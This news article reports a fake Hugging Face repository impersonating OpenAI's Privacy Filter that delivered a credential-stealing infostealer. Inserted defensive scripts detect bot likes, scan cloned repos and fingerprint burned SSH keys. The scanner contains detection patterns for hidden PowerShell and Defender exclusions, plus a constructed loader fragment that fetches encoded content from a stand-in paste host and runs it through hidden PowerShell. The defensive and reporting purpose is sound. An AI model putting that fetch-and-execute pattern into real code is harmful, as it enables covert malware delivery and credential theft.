In brief
- A malicious Hugging Face repository impersonating OpenAI's Privacy Filter model reached #1 trending on the platform.
- The malware registered roughly 244,000 downloads and 667 likes in under 18 hours before being removed.
- The repository delivered a six-stage infostealer that harvested browser passwords, Discord tokens, crypto wallet keys, and SSH credentials from Windows machines, then silently sent everything to attacker-controlled servers.
OpenAI released Privacy Filter in late April: a small, open-weight model built to detect and automatically redact personally identifiable information from text. It landed on Hugging Face under an Apache 2.0 license and quickly attracted developer interest. Somebody noticed.
Within days, a fake account named "Open-OSS" published a near-identical repository called privacy-filter. The model card was copied word for word from OpenAI's. The only difference in the readme file: instructions to clone the repo and run a file called start.bat on Windows, or loader.py on Linux and Mac.
Within 18 hours, the fake repo hit #1 on Hugging Face's trending page, racking up roughly 244,000 downloads and 667 likes. HiddenLayer, the AI security firm that flagged the campaign, found that 657 of those 667 likes came from accounts matching predictable auto-generated bot-naming patterns.
The download numbers were almost certainly inflated the same way: manufactured social proof to make the bait look real.
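The like-count check described above can be approximated with a couple of naming heuristics. The script below is an added example, not HiddenLayer's method or Hugging Face's tooling: the usernames are constructed, and the two rules (a bare word plus a long numeric suffix, and runs of consecutive numeric suffixes on the same prefix) are assumptions about what "predictable auto-generated" names look like.

```python
import re
from collections import defaultdict

# Constructed sample of accounts that "liked" a repository. None of these are
# real Hugging Face users; the sequential and word+digits names imitate the
# auto-generated pattern the article refers to.
SAMPLE_LIKERS = [
    "alice-ml", "deepmind_fan", "bob", "jsmith",                  # plausible humans
    "user4830219", "user4830220", "user4830221", "user4830222",  # sequential batch
    "zoe_8811023", "kai_1234567", "qwerty_94411", "dataneo_7710932",
    "happyllama2023",                                            # year suffix, likely human
]

# Assumption: a lowercase word, optionally followed by _ or -, then five or
# more digits is the kind of "predictable auto-generated" name flagged above.
AUTO_NAME = re.compile(r"^[a-z]+[_-]?\d{5,}$")
PREFIX_NUM = re.compile(r"^([a-z]+)[_-]?(\d+)$")


def looks_auto_generated(name: str) -> bool:
    return AUTO_NAME.match(name.lower()) is not None


def sequential_suffix_groups(names, min_run: int = 3) -> set:
    """Names whose shared alphabetic prefix carries consecutive numeric
    suffixes (user100, user101, user102 ...) in a run of at least min_run."""
    by_prefix = defaultdict(list)
    for n in names:
        m = PREFIX_NUM.match(n.lower())
        if m:
            by_prefix[m.group(1)].append((int(m.group(2)), n))
    flagged = set()
    for items in by_prefix.values():
        items.sort()
        run = [items[0]]
        for prev, cur in zip(items, items[1:]):
            if cur[0] == prev[0] + 1:
                run.append(cur)
            else:
                if len(run) >= min_run:
                    flagged.update(n for _, n in run)
                run = [cur]
        if len(run) >= min_run:
            flagged.update(n for _, n in run)
    return flagged


def assess_likes(names, min_run: int = 3) -> dict:
    """Combine both heuristics and report what share of the likes they flag."""
    auto = {n for n in names if looks_auto_generated(n)}
    flagged = auto | sequential_suffix_groups(names, min_run)
    return {
        "total": len(names),
        "flagged": len(flagged),
        "ratio": len(flagged) / len(names) if names else 0.0,
        "flagged_names": sorted(flagged),
    }


if __name__ == "__main__":
    report = assess_likes(SAMPLE_LIKERS)
    print(f"{report['flagged']} of {report['total']} likes look automated "
          f"({report['ratio']:.0%}):", ", ".join(report["flagged_names"]))
```

The ratio is the useful output: a handful of bot-like names among thousands of likes is noise, while a repository whose likes are almost entirely such accounts, as in the 657-of-667 case above, is a strong signal that the trending position was bought rather than earned.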
How the malware actually worked
The malware basically worked like a poisoned pill wrapped in a very convincing candy coating. The loader.py script opens with fake model training output (progress bars, synthetic datasets, dummy class names) designed to look like a real AI loader is running.
Under the hood, it quietly disables security checks, pulls an encoded command from a public JSON paste site (a smart trick: no need to update the repository when the payload changes), and passes that command to PowerShell running completely hidden in the background. Windows users see nothing.
That command downloads a second script from a domain mimicking a blockchain analytics API. That script downloads the actual malware, a custom-built infostealer written in Rust, adds it to Windows Defender's exclusions list, then launches it at SYSTEM-level privileges via a scheduled task that immediately deletes itself after firing. The whole chain runs and cleans up after itself, leaving almost no trace.
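Every stage in that chain leaves a recognisable trace in the scripts a user is asked to run, which is something you can check for before executing anything from a freshly cloned model repository. The triage scanner below is an added example, not code from the repository or from HiddenLayer's report: the indicator regexes are assumptions about what the described behaviours look like in source, and both the "loader" fragment and the benign loader are constructed (placeholder URL and model name, not runnable as loaders).

```python
import re
from pathlib import Path

# Heuristic indicators for the behaviours described above. These are
# assumptions written for this example, not signatures from any report.
INDICATORS = [
    ("hidden PowerShell window",
     re.compile(r"-WindowStyle[\s\"',]+Hidden|CREATE_NO_WINDOW|0x08000000", re.I)),
    ("encoded or remote command handed to PowerShell",
     re.compile(r"powershell[^\n]*-(EncodedCommand|enc)\b|Invoke-Expression|\biex\b", re.I)),
    ("payload fetched from a paste site",
     re.compile(r"https?://[^\s\"']*paste[^\s\"']*", re.I)),
    ("base64-decoded remote content",
     re.compile(r"\bb64decode\b|FromBase64String", re.I)),
    ("TLS or security checks disabled",
     re.compile(r"_create_unverified_context|verify\s*=\s*False|Set-MpPreference\s+-Disable", re.I)),
    ("Defender exclusion added",
     re.compile(r"Add-MpPreference\s+-Exclusion", re.I)),
    ("scheduled task running as SYSTEM",
     re.compile(r"schtasks[^\n]*/ru\s+SYSTEM|Register-ScheduledTask", re.I)),
]
SCRIPT_SUFFIXES = {".py", ".bat", ".cmd", ".ps1", ".sh"}

# Constructed fragment with the traits the article describes: cosmetic training
# output, a disabled TLS check, a paste-site fetch, a hidden PowerShell call.
# Placeholder URL and placeholder command; it is sample input, not a loader.
SAMPLE_LOADER = """\
print("Epoch 1/3  [=====>        ] 38%  loss=0.412")
ctx = ssl._create_unverified_context()
raw = base64.b64decode(urllib.request.urlopen("https://pastesite.example/raw/PLACEHOLDER", context=ctx).read())
subprocess.Popen(["powershell", "-WindowStyle", "Hidden", "-EncodedCommand", "<PLACEHOLDER>"])
"""

# Constructed benign counterpart: loading weights needs no shell at all.
BENIGN_LOADER = """\
from transformers import AutoModelForTokenClassification, AutoTokenizer
tok = AutoTokenizer.from_pretrained("vendor/model-name-PLACEHOLDER")
model = AutoModelForTokenClassification.from_pretrained("vendor/model-name-PLACEHOLDER")
"""


def scan_text(text: str, filename: str = "<memory>") -> list:
    """One finding per (line, indicator) match, in file order."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for label, pattern in INDICATORS:
            if pattern.search(line):
                findings.append({"file": filename, "line": lineno,
                                 "indicator": label, "snippet": line.strip()[:100]})
    return findings


def verdict(findings: list) -> str:
    """Distinct indicator families drive the verdict, so a lone verify=False
    in a test helper does not rank like a genuine multi-stage chain."""
    families = {f["indicator"] for f in findings}
    if len(families) >= 3:
        return "high"
    return "suspicious" if families else "clean"


def scan_repo(root) -> dict:
    """Scan every script in a cloned model repo. A weights-only repo should
    need no executable script, so the script list is itself a signal."""
    root = Path(root)
    scripts = sorted(p for p in root.rglob("*")
                     if p.is_file() and p.suffix.lower() in SCRIPT_SUFFIXES)
    findings = []
    for p in scripts:
        findings.extend(scan_text(p.read_text(errors="replace"), str(p.relative_to(root))))
    return {"scripts": [str(p.relative_to(root)) for p in scripts],
            "findings": findings, "verdict": verdict(findings)}


if __name__ == "__main__":
    for name, text in (("loader.py (constructed)", SAMPLE_LOADER), ("benign", BENIGN_LOADER)):
        hits = scan_text(text, name)
        print(name, "->", verdict(hits))
        for h in hits:
            print(f"  line {h['line']}: {h['indicator']}")
```

Run `scan_repo` on the clone directory before following any "run start.bat / loader.py" instruction in a model card. A model card whose instructions require a batch file or a shell-spawning Python script should already be treated as suspicious; the scanner only makes the reason concrete.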
The final payload is thorough. It grabs everything stored in Chrome and Firefox: saved passwords, session cookies, browser history, encryption keys, everything. It targets Discord accounts, cryptocurrency wallet seed phrases, SSH keys, FTP credentials, and takes screenshots across all screens. Then it packages everything as a compressed JSON bundle and ships it to attacker-controlled servers.
There's no need for us to tell you what the hackers can do with all that information later.
The malware also checks whether it is running in a virtual machine or a security sandbox, and quits quietly if it detects one. It is designed to run once on real targets, steal everything, and disappear.
Why this is bigger than just one repo
This isn't an isolated incident. It's part of a pattern. HiddenLayer identified six additional repositories under a separate Hugging Face account named "anthfu," uploaded in late April, using the very same malicious loader pointing to the very same command server. These repos impersonated models like Qwen3, DeepSeek, and Bonsai to lure AI developers.
The infrastructure itself, a domain called api.eth-fastscan.org, was also observed hosting a separate malware sample that beacons to a command server. HiddenLayer believes the two campaigns are "likely linked" but cautions that shared infrastructure alone does not confirm a single operator.
This is what a supply chain attack against the AI developer community looks like. The attacker doesn't break into OpenAI or Hugging Face. They just publish a convincing lookalike, game the trending algorithm with bots, and wait for developers to do the rest. A similar playbook hit the Lottie Player JavaScript library in 2024, costing one user 10 Bitcoin (worth over $700,000 at the time).
What if you downloaded it?
If you cloned Open-OSS/privacy-filter on a Windows machine and ran any file from it, you should treat the device as fully compromised. Don't log into anything from that machine before wiping it.
After that, change all the credentials that were saved in your browser: passwords, session cookies, OAuth tokens. Move any crypto funds to a new wallet generated on a clean device as soon as possible and assume seed phrases were stolen.
Since it also grabs your Discord data, and that service is heavily automated, you should invalidate your Discord sessions and reset that password. Any SSH keys or FTP credentials on that machine should be considered burned.
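"Considered burned" is only useful if you can find every place the stolen SSH keys are trusted. The script below is an added example, not part of the article or of any vendor tooling: it computes the same SHA256 fingerprint that `ssh-keygen -lf` prints for each public key on the compromised machine, then locates matching entries in a server's authorized_keys file so they can be deleted (and the fingerprints compared against the keys page of any code-hosting account). The keys and the authorized_keys content are constructed; the `~/.ssh/*.pub` layout assumed by `burned_fingerprints` is an assumption.

```python
import base64
import hashlib
from pathlib import Path


def fingerprint_pubkey_line(line: str):
    """Return (key_type, "SHA256:<fingerprint>", comment) for one OpenSSH
    public-key line, in the format ssh-keygen -lf prints."""
    parts = line.strip().split(None, 2)
    if len(parts) < 2:
        raise ValueError("not an OpenSSH public key line")
    key_type, b64 = parts[0], parts[1]
    comment = parts[2] if len(parts) == 3 else ""
    blob = base64.b64decode(b64)
    # The wire blob starts with a length-prefixed key-type string that must
    # agree with the text form; anything else is a malformed line.
    n = int.from_bytes(blob[:4], "big")
    if blob[4:4 + n] != key_type.encode():
        raise ValueError("key type field does not match blob")
    digest = hashlib.sha256(blob).digest()
    return key_type, "SHA256:" + base64.b64encode(digest).decode().rstrip("="), comment


def burned_fingerprints(ssh_dir) -> dict:
    """fingerprint -> (key_type, comment, path) for every *.pub under ssh_dir
    on the compromised machine (assumes the usual ~/.ssh layout)."""
    out = {}
    for pub in Path(ssh_dir).glob("*.pub"):
        key_type, fp, comment = fingerprint_pubkey_line(pub.read_text())
        out[fp] = (key_type, comment, str(pub))
    return out


def lines_to_remove(authorized_keys_text: str, burned: set) -> list:
    """1-based line numbers in an authorized_keys file whose key fingerprint is
    in `burned`; these are the entries to delete on each server."""
    hits = []
    for lineno, line in enumerate(authorized_keys_text.splitlines(), 1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        # authorized_keys entries may carry options (command="...", from=...)
        # before the key; the key starts at the first key-type field.
        fields = stripped.split()
        for i, field in enumerate(fields):
            if field.startswith(("ssh-", "ecdsa-", "sk-")):
                try:
                    _, fp, _ = fingerprint_pubkey_line(" ".join(fields[i:]))
                except ValueError:
                    break
                if fp in burned:
                    hits.append(lineno)
                break
    return hits


def constructed_pubkey_line(seed: int, comment: str) -> str:
    """A syntactically valid ssh-ed25519 line built from a fake 32-byte point.
    Constructed for the example only; it is not a real key."""
    point = bytes((seed + i) % 256 for i in range(32))
    blob = b"\x00\x00\x00\x0bssh-ed25519" + b"\x00\x00\x00\x20" + point
    return f"ssh-ed25519 {base64.b64encode(blob).decode()} {comment}"


# Constructed scenario: the laptop held one key; a server's authorized_keys
# trusts that key (with a forced command) plus an unrelated CI key.
LAPTOP_KEY = constructed_pubkey_line(0, "dev@compromised-laptop")
OTHER_KEY = constructed_pubkey_line(100, "ci@build-runner")
SERVER_AUTHORIZED_KEYS = "\n".join([
    "# keys for deploy user",
    OTHER_KEY,
    'command="/usr/bin/rrsync /srv" ' + LAPTOP_KEY,
])


def demo() -> list:
    _, burned_fp, _ = fingerprint_pubkey_line(LAPTOP_KEY)
    return lines_to_remove(SERVER_AUTHORIZED_KEYS, {burned_fp})


if __name__ == "__main__":
    print("burned:", fingerprint_pubkey_line(LAPTOP_KEY)[1])
    print("authorized_keys lines to remove:", demo())
```

Fingerprints rather than raw key text are what you want to circulate to colleagues and server owners: they are short, safe to paste into a ticket, and match what `ssh-keygen -lf` and the hosting platforms display, so the burned keys can be recognised anywhere they were ever added.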
The repository has now been removed. Hugging Face has not disclosed what, if any, additional screening measures it plans to implement for trending repositories.
As of now, seven confirmed malicious repositories from this campaign have been identified. How many more exist, or existed before being detected, remains unknown.
